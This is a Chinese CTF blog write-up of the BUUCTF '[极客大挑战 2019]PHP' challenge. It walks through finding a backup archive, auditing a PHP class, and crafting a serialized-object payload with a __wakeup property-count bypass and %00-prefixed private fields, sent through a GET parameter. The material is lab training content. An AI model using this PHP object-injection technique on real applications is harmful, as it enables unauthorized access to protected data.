ctf每日练习-第五天

最新推荐文章于 2022-06-01 17:46:10 发布
最新推荐文章于 2022-06-01 17:46:10 发布
阅读量253 收藏 1
点赞数
分类专栏: ctf-WP 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46743327/article/details/108430390
版权

上午去了一趟图书馆,可是昨天真的太累了,今天上午完全打不起精神,就蹉跎了一上午,中午回来做了做题。

[极客大挑战 2019]PHP(来自buuctfweb区)

在这里插入图片描述打开网站,唯一的提示就是备份,所以我们扫描一下网站

发现有一个www.zip,我们下载下来
发现里面有一个flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

果然是备份文件,没有任何用。

再看index.php

  <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

发现有一个反序列化,并且是用get方式传递值

所以我们看一下class,php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>


审计代码,发现需要最后反序列化时username为admin,并且password	为100才能echo $flag(当前的文件,不是备份的那个文件)
而wake_up会将username变成user,所以需要绕过一下

先序列化

在这里插入图片描述
得到
O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}

当对象成员变量个数多于实际个数的时候,wake_up会不运行,可以达成绕过
ps:关于wake_up漏洞,可以看一下这篇文章
大佬的文章

O:4:“Name”:3:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}

这里要注意的是,因为两个变量都是私有变量,所以需要在变量名和类名前加上%00

这篇文章里知识比较详细:大佬的博客

最后O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
直接在url里加上/?select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

在这里插入图片描述

_wand1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
备战CTF
weixin_40707492的博客
07-21 6135
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
一小白的CTF练习(持续更新~)
qq_68093438的博客
09-28 834
一个小白从0开始学习网安的记录~
[CTF从0到1学习] 一、CTF 概述
qq_43710889的博客
11-13 5729
[CTF从0到1学习] 一、CTF 概述 哈哈,在学校图书馆借到的一本比较好的讲CTF的书籍,因为有配套资料。感觉不错,准备研读一波。先做一个引言吧‘’ 首先大家能搜到这篇文章,也一定对CTF有一定了解,亦或是对网络安全感兴趣。这篇文章会分享CTF的起源,模式,所需要的基本技能的一个概述。 文章目录[CTF从0到1学习] 一、CTF 概述CTF起源CTF模式CTF必备的基础技能CTF环境搭建 CTF起源 CTF起源与1996年的DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的
CTF web总结--unserizable
bob的博客
08-29 1255
php的反序列化漏洞
ctfphp常见的考点
热门推荐
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码目。 其他说明: 该工具具备智能判断密码...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctfshow反序列化
njh18790816639的博客
04-18 1076
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
php 反序列化 ctf,CTF-Web-PHP反序列化
weixin_31940835的博客
03-27 447
概念解释PHP 反序列化漏洞又叫做 PHP 对象注入漏洞,我觉得这个表达很不直白,也不能说明根本的问,不如我们叫他 PHP 对象的属性篡改漏洞好了(别说这是我说的~~)反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,从上面的例子看,这个函数的参数是一个序列化的对象,而序列化的对象只含有对象的属性,那我们就要利用对对象属性的篡改实现最终的攻击。魔法方法construct...
CTF之萌新反序列化学习
bmth666的博客
01-13 5091
概念 数据(变量)序列化(持久化) 将一个变量的数据“转换为”字符串,但并不是类型转换,目的是将该字符串储存在本地。相反的行为称为反序列化。 序列化和反序列化的目:使得程序间传输对象会更加方便 # 相关函数 ...
2021-03-10-PHP代码审计
qq_50963064的博客
11-15 860
PHP代码审计 由于重点是代码审计,所以直接看代码了。 [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //设置白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTFweb十一道(02)
qq_45837896的博客
06-01 967
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这里我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
CTF中常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2484
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
【BUUCTF】[极客大挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1925
【BUUCTF】[极客大挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
安全攻防知识-7】CTF之web(1)
qq_26579613的博客
06-01 4239
ctf-web型总结
[CTFSHOW]反序列化(仅更新必要的目)
Y4tacker的博客
12-02 4575
文章目录前言web254-web256web257 前言 新的篇章师傅们加油鸭 web254-web256 有空补上 web257 代码审计,魔法函数 __construct当对象被创建的时候自动调用,对对象进行初始化。当所有的操作执行完毕之后,需要释放序列化的对象,触发__destruct()魔术方法 <?php error_reporting(0); highlight_file(__FILE__); class ctfShowUser{ private $username='xxxxx
ctfhub-git泄露stash
最新发布
09-13
同时,你也可以使用dirsearch工具来扫描目录,执行命令"python dirsearch.py -u http://challenge-5a5d24023f7ea71c.sandbox.ctfhub.com:10800 -e git -t 5"来查找ctfhub-git泄露的stash。 然而,需要注意的是,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值